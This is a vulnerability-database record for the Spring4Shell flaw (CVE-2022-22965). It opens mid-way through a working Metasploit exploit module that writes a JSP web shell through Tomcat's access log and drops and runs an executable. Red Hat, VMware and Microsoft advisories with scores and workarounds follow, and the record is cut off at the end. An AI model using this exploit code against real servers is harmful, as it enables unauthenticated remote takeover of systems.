5.2.19, and older versions when running on JDK 9 or above \nand specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable \nto remote code execution due to an unsafe data binding used to populate an object from request parameters \nto set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the \norg.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: \nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can \ngain remote code execution. \n}, \n'Author' => [ \n'vleminator <vleminator[at]gmail.com>' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-22965'], \n['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], \n['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] \n], \n'Platform' => %w[linux win], \n'Payload' => { \n'Space' => 5000, \n'DisableNops' => true \n}, \n'Targets' => [ \n[ \n'Java', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => %w[linux win] \n}, \n], \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux' \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win' \n} \n] \n], \n'DisclosureDate' => '2022-03-31', \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Spring4Shell', 'SpringShell'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), \nOptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), \nOptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), \n] \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef jsp_dropper(file, exe) \n# The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. \ndropper = <<~EOS \n<%@ page import=\\\"java.io.FileOutputStream\\\" %> \n<%@ page import=\\\"java.util.Base64\\\" %> \n<%@ page import=\\\"java.io.File\\\" %> \n<% \nFileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false); \noFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\")); \noFile.flush(); \noFile.close(); \nFile f = new File(\\\"#{file}\\\"); \nf.setExecutable(true); \nRuntime.getRuntime().exec(\\\"#{file}\\\"); \n%> \nEOS \n \ndropper \nend \n \ndef modify_class_loader(method, opts) \ncl_prefix = 'class.module.classLoader' \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'version' => '1.1', \n'method' => method, \n'headers' => { \n'c1' => '<%', # %{c1}i replacement in payload \n'c2' => '%>' # %{c2}i replacement in payload \n}, \n\"vars_#{method == 'GET' ? 'get' : 'post'}\" => { \n\"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format] \n} \n}) \nend \n \ndef check_log_file \nprint_status(\"#{peer} - Waiting for the server to flush the logfile\") \nprint_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\") \n \nsucceeded = retry_until_true(timeout: 60) do \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(@jsp_file) \n}) \n \nres&.code == 200 && !res.body.blank? \nend \n \nfail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded \n \nprint_good(\"#{peer} - Log file flushed\") \nend \n \n# Fix the JSP payload to make it valid once is dropped \n# to the log file \ndef fix(jsp) \noutput = '' \njsp.each_line do |l| \nif l =~ /<%.*%>/ \noutput << l \nelsif l =~ /<%/ \nnext \nelsif l =~ /%>/ \nnext \nelsif l.chomp.empty? \nnext \nelse \noutput << \"<% #{l.chomp} %>\" \nend \nend \noutput \nend \n \ndef create_jsp \njsp = <<~EOS \n<% \nFile jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\"); \njsp.delete(); \n%> \n#{Faker::Internet.uuid} \nEOS \nif target['Arch'] == ARCH_JAVA \njsp << fix(payload.encoded) \nelse \npayload_exe = generate_payload_exe \npayload_filename = rand_text_alphanumeric(rand(4..7)) \n \nif target['Platform'] == 'win' \npayload_path = datastore['WritableDir'] + '\\\\' + payload_filename \nelse \npayload_path = datastore['WritableDir'] + '/' + payload_filename \nend \n \njsp << jsp_dropper(payload_path, payload_exe) \nregister_files_for_cleanup(payload_path) \nend \n \njsp \nend \n \ndef check \n@checkcode = _check \nend \n \ndef _check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) \n) \n \nreturn CheckCode::Unknown('Web server seems unresponsive') unless res \n \nif res.headers.key?('Server') \nres.headers['Server'].match(%r{(.*)/([\\d|.]+)$}) \nelse \nres.body.match(%r{Apache\\s(.*)/([\\d|.]+)}) \nend \n \nserver = Regexp.last_match(1) || nil \nversion = Rex::Version.new(Regexp.last_match(2)) || nil \n \nreturn Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) \n \nvprint_status(\"Detected #{server} #{version} running\") \n \nif datastore['HTTP_METHOD'] == 'Automatic' \n# prefer POST over get to keep the vars out of the query string if possible \nmethods = %w[POST GET] \nelse \nmethods = [ datastore['HTTP_METHOD'] ] \nend \n \nmethods.each do |method| \nvars = \"vars_#{method == 'GET' ? 'get' : 'post'}\" \nres = send_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } \n) \n \n# setting the default assertion status to a valid status \nsend_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } \n) \nreturn Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprefix_jsp = rand_text_alphanumeric(rand(3..5)) \ndate_format = rand_text_numeric(rand(1..4)) \n@jsp_file = prefix_jsp + date_format + '.jsp' \nhttp_method = datastore['HTTP_METHOD'] \nif http_method == 'Automatic' \n# if the check was skipped but we need to automatically identify the method, we have to run it here \n@checkcode = check if @checkcode.nil? \nhttp_method = @checkcode.details[:method] \nfail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? \n \nprint_good(\"Automatically identified HTTP method: #{http_method}\") \nend \n \n# if the check method ran automatically, add a short delay before continuing with exploitation \nsleep(5) if @checkcode \n \n# Prepare the JSP \nprint_status(\"#{peer} - Generating JSP...\") \n \n# rubocop:disable Style/FormatStringToken \njsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') \n# rubocop:enable Style/FormatStringToken \n \n# Modify the Class Loader \nprint_status(\"#{peer} - Modifying Class Loader...\") \nproperties = { \npayload: jsp, \ndirectory: datastore['PAYLOAD_PATH'], \nprefix: prefix_jsp, \nsuffix: '.jsp', \nfile_date_format: date_format \n} \nres = modify_class_loader(http_method, properties) \nunless res \nfail_with(Failure::TimeoutExpired, \"#{peer} - No answer\") \nend \n \n# No matter what happened, try to 'restore' the Class Loader \nproperties = { \npayload: '', \ndirectory: '', \nprefix: '', \nsuffix: '', \nfile_date_format: '' \n} \n \nmodify_class_loader(http_method, properties) \n \ncheck_log_file \n \nhandler \nend \n \n# Retry the block until it returns a truthy value. Each iteration attempt will \n# be performed with expoential backoff. If the timeout period surpasses, false is returned. \ndef retry_until_true(timeout:) \nstart_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nending_time = start_time + timeout \nretry_count = 0 \nwhile Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time \nresult = yield \nreturn result if result \n \nretry_count += 1 \nremaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nbreak if remaining_time_budget <= 0 \n \ndelay = 2**retry_count \nif delay >= remaining_time_budget \ndelay = remaining_time_budget \nvprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\") \nelse \nvprint_status(\"Sleeping for #{delay} seconds before attempting again\") \nend \n \nsleep delay \nend \n \nfalse \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167011/spring_framework_rce_spring4shell.rb.txt"}], "redhatcve": [{"lastseen": "2023-12-03T20:43:29", "description": "A flaw was found in Spring Framework, specifically within two modules called Spring MVC and Spring WebFlux, (transitively affected from Spring Beans), using parameter data binding. This flaw allows an attacker to pass specially-constructed malicious requests to certain parameters and possibly gain access to normally-restricted functionality within the Java Virtual Machine.\n#### Mitigation\n\nFor those who are not able to upgrade affected Spring classes to the fixed versions, there is a workaround customers can implement for their applications, via setting disallowed fields on the data binder, and denying various iterations of the string "class.*" \n\n\nFor full implementation details, see Spring's early announcement post in the "suggested workarounds" section: <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:57", "type": "redhatcve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-11-11T07:03:52", "id": "RH:CVE-2022-22965", "href": "https://access.redhat.com/security/cve/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-13T03:14:07", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2023-10-13T01:34:03", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2023-12-03T16:01:37", "description": "3\\. Problem Description \n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-30T00:00:00", "id": "VMSA-2022-0010.5", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.5.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T08:32:24", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "id": "VMSA-2022-0010.3", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-14T16:19:16", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "VMSA-2022-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:13:59", "description": "##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs \n\n * VMware Tanzu Operations Manager\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T00:00:00", "id": "VMSA-2022-0010.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-18T12:09:47", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "VMSA-2022-0010.4", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.4.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:6DA934C9E783C787D408548AA6F1CEC3", "href": "https://msrc.microsoft.com/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:26:47", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 